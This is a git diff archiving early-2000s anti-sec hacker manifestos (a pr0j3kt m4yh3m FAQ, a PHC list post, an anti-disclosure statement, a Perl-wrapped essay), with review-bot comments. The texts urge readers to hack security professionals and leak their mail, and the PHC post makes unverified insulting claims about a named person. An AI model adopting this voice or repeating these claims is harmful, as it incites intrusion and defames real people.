+they can't bare anymore with the FUD and lies spread by the whitehat
+community, with the greed that is definitory for IT security companies, with
+the leeching performed by these companies on hackers and so on. Pr0j3kt
+m4yh3m is carried on by multiple independant cells who accomplish project's
+missions. This movement is not about terrorism but more about retaliation
+and cyber guerilla warfare.
+
+
+2. Why do you hate whitehats? Just because they earn money?
+
+Heh, this one is a redundant question. It keeps repeating all the time. Now,
+once and for all, we don't hate the whitehats because they earn money but
+for the ways they earn those money. By lying, by spreading rumours, by
+leeching on the underground that formed them. Them and IT companies are also
+targeted because they lie clueless people regarding hackers. They make
+hackers look as some sort of cyber terrorist that all he does is creating
+panic amongst all sorts of internet habitants. They also say that hackers
+can break into *ANY* machine connected to the internet, this ofcourse
+creating panic and enlarging their market segment. They don't care about
+security, all they do care about is money. They are evil! They leech their
+employees, they leech the underground, they leech their clients. Figure out
+for yourself.
+
+
+3. Why are you guys against full disclosure?
+
+Disclosure is, never the less, a bad thing. Figure it out: how many
+classified informations from other domains are made public?! NONE, zero,
+nada, nothing! But still, they promote the full disclosure in computer
+security. Have you ever asked yourself why? It's not that they care for the
+regular company that can't afford to hire a decent administrator... They
+want publicity, they want media attention, all this resulting in material
+benefits: if an IT security company makes public a proof-of-concept code or
+an advisory, it performs two things. It gets fame for that (and ofcourse, a
+larger market segment) and thousands of kiddies all over the world eventually
+work out an exploit from the advisory. So, people would fear getting hacked
+so, they would become customers of that IT security company. Remember this:
+knowledge given is power lost. Why giving powerful weapons to the kids all
+over?
+
+
+4. Real blackhats stay in underground. Why did u come out front?
+
+As we stated in 1., we just can't stand anymore seeing what the whitehat
+community is doing. They almost killed the scene, breaking it in half.
+Whitehats all over the world are brainwashing thousands and thousands of
+people, making them share their mindset. As a result, people think that
+blackhat equals script kiddie and hacker equals IT security researcher. This
+is so wrong! Hackers hack! Most of whitehat knowledge originates from the
+underground. Most of the stuff they publish is heard by them from the few
+underground connections left. And yet, they try to kill this underground and
+they call it "script kiddies". ~el8/PHC/other groups will carry on this war
+forever, until something changes! More and more groups adhere to pr0j3kt
+m4yh3m.
+
+
+5. Is Pr0j3kt M4yh3m visible to us?
+
+Hell yeah! Even if nobody knows the other cells, even if nobody knows what
+others do, look around you: you see supposedly secured servers gettin
+hacked, you see security professionals hacked proving that they are giving a
+false sense of security. *EVERYTHING* aimed at harming security industry in
+one way or the other is an action of pr0j3kt m4yh3m. Pr0j3kt's cells are
+spread all over the world, one could even be in your neighbourhood so watch
+out!
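Review bot: the names faq1.txt and faq2.txt do not say which FAQ is which; the previous file is the "#PHRACK FAQ" signed by the PHC and this one is the pr0j3kt m4yh3m FAQ. Consider descriptive file names or an index in the README mapping each file to its title and author. Also, the first added line of this file is a single line of roughly 140 characters while the rest is wrapped below 80 columns; check whether the source had a line break after "the same questions..".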
diff --git a/anti-sec/txt/hack4.txt b/anti-sec/txt/hack4.txt
new file mode 100644
index 0000000..ac4adee
--- /dev/null
+++ b/anti-sec/txt/hack4.txt
@@ -0,0 +1,199 @@
+
+A PHC PRODUCTION: THE REAL SCRIPTKIDDIES
+
+[Posted to the netsys.com 'full-disclosure' list.]
+
+Does anyone find it strange that the talentless scriptkiddy Ron DuFresne is
+banging on about "kids this" and "kids that"? I certainly do. This clueless
+moron is in no position to speak down on or scold those he obviously knows
+nothing about.
+
+If you search google for his name, you can easily see the technically inept
+scriptkiddy Ron DuFresne making a monkey out of himself:
+
+http://www.google.com/search?q=%22Ron+DuFresne%22
+
+This guy knows nothing beyond 1980's security policy construction and
+point-and-click firewall operation. He makes many technical blunders in his
+posts and displays an uncanny knack for sounding like a total dumbass.
+
+For those out of the loop, the scriptkiddy Ron DuFresne was a former member
+of the defacement group known as GForce Pakistan, albeit only for a month or
+so at most. What's sad is that he has admitted this in the past, but
+justifies it as some kind of adventure "for research purposes." He also
+denies having defaced any websites. Still, makes you wonder, doesn't it?
+
+I also see many other technically incompetent people/leeches on this list
+who are making unqualified assertions that so-and-so are scriptkids, that
+so-and-so don't know their stuff, that so-and-so are attention deprived...
+
+If you can answer 'yes' to all of the questions below, then by all means
+feel free to think of yourself as equal to or better than these ~el8 guys.
+Otherwise, please stop speaking down to people who are obviously much more
+technically skilled than your ignorance will ever allow you to be.
+
+* Do you know how to program in C? Are you intimately familiar with ISO C89?
+C99? While other people in your neighbourhood were out partying, were you
+sitting at home in bed making an almost biblical study of the POSIX
+standards? What about those from The Open Group?
+
+* Do you know how to write hash tables? Balanced trees? Do you know the art
+of algorithms? Do you know Knuth's work like the back of your hand? Did you
+teach yourself everything about computers that one would otherwise only
+learn by paying thousands of dollars for in Computer Science tuition?
+
+* Do you know how to juggle assembly code in your head for multiple
+architectures, such as MIPS, SPARC, x86? Do you understand the peculiarities
+of each architecture down to the nittiest, grittiest details? Can you
+optimize your own assembly routines? Can you take advantage of things such
+as Pentium instruction pairing or the delay slots in various RISC
+architectures? Do you understand the deal with the I-Cache on MIPS? Are you
+fluent in assembly language? Hell, do you even know what SPARC stands for?
+Quadrants in PA-RISC, make sense?
+
+* Do you know how to write your own exploits? Do you know how to audit
+software with surgical precision for the most intricate bugs imaginable? Do
+you know how to take advantage of buffer overflows? Do you know how to
+exploit off-by-one errors on a little-endian machine? Do you know about
+integer overflows and signedness issues? Can you exploit format string
+vulnerabilities? Can you gain control of a process vulnerable to a heap
+overflow via a deep knowledge of the malloc implementation on the target
+host? Do you know how to bypass the "security" afforded by crap like
+Openwall, StackGuard, PaX? Or is your knowledge of these things limited to
+the papers that non-hackers publish? You probably think the people trying to
+help the security community with bullshit patches/fixes like this are
+hackers, when in fact no hacker would ever publish any such thing that aims
+to improve security.
+
+* Have you studied the UNIX kernel with as much fervour as some would have
+for physical pursuits such as basketball or baseball? Do you know the data
+structures and organization in the kernels of various operating systems?
+Have you read books on UNIX internals cover to cover? Do you know how Linux
+works under the hood? Can you write your own kernel modules for both defense
+and offense? Ever written a kld on FreeBSD? Can you write a device driver
+for a peripheral that your OS doesn't support? Can you find flaws in kernel
+src trees that allow you to compromise a machine given local access?
+
+* What do you know about evading (N)IDS? Your knowledge isn't limited to
+what Thomas Ptacek & Tim Newsham have said years ago, right? Surely you
+don't rely on tools written by people like Dug Song who like to think of
+themselves as hackers, when in fact they are traitors to the underground,
+assuming they were ever a part of it to begin with.
+
+* What do you know about defeating firewalls? What techniques have you
+innovated and pioneered on your own? What tools have you written that allow
+you to toy with firewalls? Hell, the fucktard security community is probably
+limited to lameass crap like Firewalk.
+
+* What do you know about web security? Do you sit back and laugh at the
+"cross-site scripting" revolution governed by an idea that has been around
+well before the CSS/XSS sensation that literally blew the dumbass security
+community apart? Must've wasted a lot of brain cells with that gigantic
+stretch of the imagination. Do you laugh at all these "SQL injection" papers
+and how most of them overlook the blatantly obvious: they have you believe
+you have to fumble around with all kinds of convoluted queries to achieve
+something that can be done with minimal typing if only they'd read the
+fucking documentation for various DBMS. Their CGI experts like RFP and
+Zenomorph call certain script conditions non-exploitable, e.g. when you
+can't get arguments supplied to a binary that you've managed to trick a Perl
+script into running -- RFP mentions this in his Phrack article -- yet any
+moron can easily figure out that you can use the POST method, make the
+script run /usr/bin/perl for instance, and have it run a script of your
+choice that is fed as stdin from the HTTP request's POST data. Oh God, sorry
+for pushing the realm of web security forward with this INCREDIBLY COMPLEX
+revelation.
+
+* Have you written your own tools that exploit protocol weaknesses? Have you
+written your own tools for routing protocol weaknesses, e.g. RIP, BGP? Have
+you written your own tools that play games with DNS? Have you written your
+own ARP cache poisoning / mitm tools? Your own tools for shit like icmp
+redirects and router advertisements? Can you write a tool that will exploit
+the TCP sequence number prediction + IP spoofing vulnerability of older
+days? Or can you only mock Mitnick for his 1994 attack, calling him a
+scriptkiddy? Or utter useless banter about ISNs and cookies that you
+digested from some textfile? Who are you kidding? Fuck, have you read all 3
+volumes of the glorious TCP/IP Illustrated, or can you just mumble some
+useless crap about a 3-way handshake? Do you know Net/3 code? TCP
+algorithms? TCP extensions? Perhaps you're some fucking security expert
+because you've memorized /etc/services -- a walking fucking getservbyport, a
+la 70% of the Vuln-Dev subscription base.
+
+.....................................
+
+I have seen the ~el8 guys cover the full spectrum of everything discussed
+above. 95% of the people calling them scriptkids probably can't even code
+helloworld.c.
+
+Further ranting for those who are so quick to judge...
+
+Are you just a fucking whitehat leech who knows nothing more than how to use
+tools written by others? Using techniques and exploits that most likely
+originated in the playground of blackhats known as the computer underground.
+More likely than not you're a fucking scriptkid who only knows how to do
+mundane and trivial crap like configuring ACLs on a Cisco router or some
+half-assed product such as Firewall-1.
+
+You likely are so ignorant that you believe anyone who compromises machines
+is a clueless scriptkiddy like yourself. You likely are so idiotic that you
+believe that Bugtraq and CERT will protect you from the latest 0day
+exploits.
+
+You think Apache 1.3.26 can't be compromised remotely with one of four two
+year old Apache remotes that haven't even been hinted at on the security
+lists. You think sendmail is (now) remotely secure because what you don't
+see on Bugtraq doesn't exist. Qmail. ProFTPd. My God, you people are so
+fucking out of it. People report intrusions on their machines and you
+dumbfucks immediately conclude it's done by some public vulnerability, e.g.
+OpenSSL. That's right, because in your ignorant bliss there are no skilled
+people out there who would actually use their exploits to hack.
+Narrow-minded fools. Scriptkiddies.
+
+You know nothing of what lurks beneath the surface glamour of the corrupt
+security industry/community. Your only resort is to call these people kids.
+
+Trust me, they laugh at you clueless imbeciles. They laugh at your feeble
+attempts to manipulate hacking so that it becomes some fucking ethical or
+philanthropic pursuit. They laugh at your "hacker vs. cracker" debates. They
+laugh at anyone who thinks hacking isn't about compromising computer
+systems.
+
+Who are the scriptkids now? You're outgunned and outclassed. Take a nap and
+retire, you pathetic leeches.
+
+The scriptkids like Ron DuFresne and Anodyne Perspective are likely going to
+snap after reading this, so I'm sitting back looking forward to the imminent
+outbursts from these scriptkids whose only rebuttals will be in the...
+
+"I have my fingers in my ears, can't hear you kids NANANANANAN JAJAJAJAJAJA
+itiththdsfhg grow up immature children, get a girlfriend HHSHee KkakakKAkka
+pffffttt damn kiddies."
+
+... range.
+
+All "dox" dropped on the lists have been fake. They have been engineered by
+people either making false assumptions or trying to get their "foes" in
+trouble. Most of the phony ~el8 members lists mention people that have been
+attacked by ~el8, ironically enough. Put one and one together. There is only
+valid "info" for one of those poor souls, anywayz.
+
+It's time for an underground revolution. You all quote The Mentor's
+Manifesto in your misguided ethics rants; alas, The Mentor was an active
+hacker, in the true, modern sense of the word. Stop being brainwashed ye
+hackers. Keep your souls untarnished.
+
+It's time to bring the corrupt security industry to its knees.
+
+THE SECURITY INDUSTRY DEMOLISHED OUR WORLD.
+
+THERE WILL NOW BE HELL TO PAY.
+
+
+                Offer up your best defense
+                But this is the end
+                This is the end of the innocence
+
+
+
+
+
+
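Review bot: hack4.txt ends with six empty added lines after "This is the end of the innocence" and starts with one, so git diff --check will report a new blank line at EOF. Trim them unless the mirror is meant to be byte-identical, in which case say so in the commit message. The header line "[Posted to the netsys.com 'full-disclosure' list.]" gives the venue but no date or message reference; adding that to the README would let readers verify the text, which matters here because the post makes unverified personal claims about named list members.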
diff --git a/anti-sec/txt/movement.txt b/anti-sec/txt/movement.txt
new file mode 100644
index 0000000..855c31c
--- /dev/null
+++ b/anti-sec/txt/movement.txt
@@ -0,0 +1,48 @@
+
+   The purpose of this movement is to encourage a new policy of anti-disclosure
+   among the computer and network security communities. The goal is not to
+   ultimately discourage the publication of all security-related news and
+   developments,  but  rather,  to  stop the disclosure of all unknown or
+   non-public exploits and vulnerabilities. In essence, this would put a stop
+   to the publication of all private materials that could allow script kiddies
+   from compromising systems via unknown methods.
+
+   The open-source movement has been an invaluable tool in the computer world,
+   and we are all indebted to it. Open-source is a wonderful concept which
+   should and will exist forever, as educational, scientific, and end-user
+   software should be free and available to everybody.
+
+   Exploits, on the other hand, do not fall into this broad category. Just like
+   munitions,  which  span  from cryptographic algorithms to hand guns to
+   missiles, and may not be spread without the control of export restrictions,
+   exploits should not be released to a mass public of millions of Internet
+   users. A digital holocaust occurs each time an exploit appears on Bugtraq,
+   and  kids  across  the  world download it and target unprepared system
+   administrators. Quite frankly, the integrity of systems world wide will be
+   ensured to a much greater extent when exploits are kept private, and not
+   published.
+
+   A common misconception is that if groups or individuals keep exploits and
+   security secrets to themselves, they will become the dominators of the
+   "illegal scene", as countless insecure systems will be solely at their
+   mercy. This is far from the truth. Forums for information trade, such as
+   Bugtraq, Packetstorm, www.hack.co.za, and vuln-dev have done much more to
+   harm the underground and net than they have done to help them.
+
+   What casual browsers of these sites and mailing lists fail to realize is
+   that  some  of the more prominent groups do not publish their findings
+   immediately, but only as a last resort in the case that their code is leaked
+   or has become obsolete. This is why production dates in header files often
+   precede release dates by a matter of months or even years.
+
+   Another false conclusion by the same manner is that if these groups haven't
+   released anything in a matter of months, it must be because they haven't
+   found anything new. The regular reader must be made aware of these things.
+
+   We are not trying to discourage exploit development or source auditing. We
+   are merely trying to stop the results of these efforts from seeing the
+   light.  Please  join  us  if  you  would  like  to  see  a stop to the
+   commercialization, media, and general abuse of infosec.
+
+   Thank you.
+
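Review bot: movement.txt was imported with the padding of a full-justified text dump: a three-space indent on every line and runs of double spaces inside sentences ("developments,  but  rather,  to  stop", "that  some  of the more"). That breaks plain-text search across the archive, since a grep for a phrase with single spaces will miss these lines. Either normalise the spacing in a follow-up commit or note that the file is an unmodified dump. The file also has no title, author or date line, so its origin should be recorded in the README.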
diff --git a/anti-sec/txt/scene_sub.txt b/anti-sec/txt/scene_sub.txt
new file mode 100644
index 0000000..d2ba588
--- /dev/null
+++ b/anti-sec/txt/scene_sub.txt
@@ -0,0 +1,54 @@
+sub Scene { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOSCENE'
+
+"Times change and technology progresses. Attackers adept and attacks evolve.
+At this point in history, we can wax fondly for the halcyon days when computers
+were hacked for pride or ego -- the good ole' simpler times when underground
+hacker wars were electronically waged and the collateral damage was the main
+website of The New York Times. Or the Solaris machines that were owned and the 
+high profile computer security icons that had their e-mail spools stolen and 
+personal poetry publicly posted. Or the OpenBSD machines that were rumored
+to be silently owned and the early copies of the most lauded online underground
+hacker journal that were distributed months ahead of time. Good times. Nowadays,
+there is no underground hacker scene -- not like there used to be (bring back 
+BoW and Hagis!)." -- Mike Schiffman from the introduction to _Hacker's_Challenge_3_
+
+While route is indeed a whitehat sellout (and appears to like watching his
+co-workers be publicly humiliated), he is certainly correct about one thing:
+The Scene is IDLE. Not just a little idle, we're talking over a year of idleness
+here. Sure, occasionally groups attempt to make a stir. Undoubtedly, some of
+the readers will remember the PHC Delka Strike Force, hosted at http://el8.ru/x/
+ (now down). Or the release of the epic h0no3 about one year ago. And of course,
+our own fun little contributions. However, despite the hard work of a number of 
+individuals, many of the goals originally set forth for pr0j3kt m4yh3m by el8 and 
+the Phrack High Council have yet to be accomplished. This needs to change. 
+Instead of chatting on IRC all day, go out and own a whitehat. Do a PHC mission. 
+Contribute to pr0j3kt m4yh3m. 
+
+The recent events revolving around the blogger known as "InfoSec Sellout" 
+bring an interesting point to light. When the older "security professionals" 
+discovered the "fact" that InfoSec Sellout was LMH and was backed by PHC, it
+caused quite a stir for those that remembered the heyday of the pr0j3kt. For 
+the whitehats that had just entered the industry post-whitehat holocaust, it 
+didn't mean a thing. They simply assumed (like 90% of the HTS userbase) that 
+PHC was/is a group of dissatisfied script kiddies. Too bad all the evidence
+points to the contrary. Another sad fact is that whitehats have not only
+taken over the public side of the scene, but the private side as well. These
+"revelations" about InfoSec Sellout at one time would have come from an
+anonymous post to FD, from a member of the underground. Now they come from a
+"respected security professional". Instead of talking about the activities of
+real hackers, the gossip reels these days deal with the exploits of whitehats
+like David Maynor, HD Moore and others. Is this what we've allowed the scene to
+become? A bunch of idlers thinking about fat middle aged whitehats? Where's the 
+rage? Where's the dedication to the eradication of the greedy security 
+consultants? Where's all the activity that was prevalent in the scene until 
+recently?
+
+A time has come for a change. Follow the example dikline set out. Take back the
+scene! Go out and actually hack. Don't post exploits to FD; post a whitehat's
+spools! Continue the legacy of the glorious pr0j3kt m4yh3m!
+
+Never sell out, never surrender.
+
+EOSCENE
+);}
+
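Review bot: scene_sub.txt is a Perl subroutine fragment, not a standalone text: it opens with "sub Scene {", passes a single-quoted heredoc to an own() helper that is not defined in this file, and closes with ");}". Nothing in the file or its name says which zine or script it was cut from, so please add that to the README. If the intent is to archive only the essay, consider storing the heredoc body by itself and keeping the wrapper in the original script file. The line break between the el8.ru URL and " (now down)" leaves a line starting with a space; check that against the source.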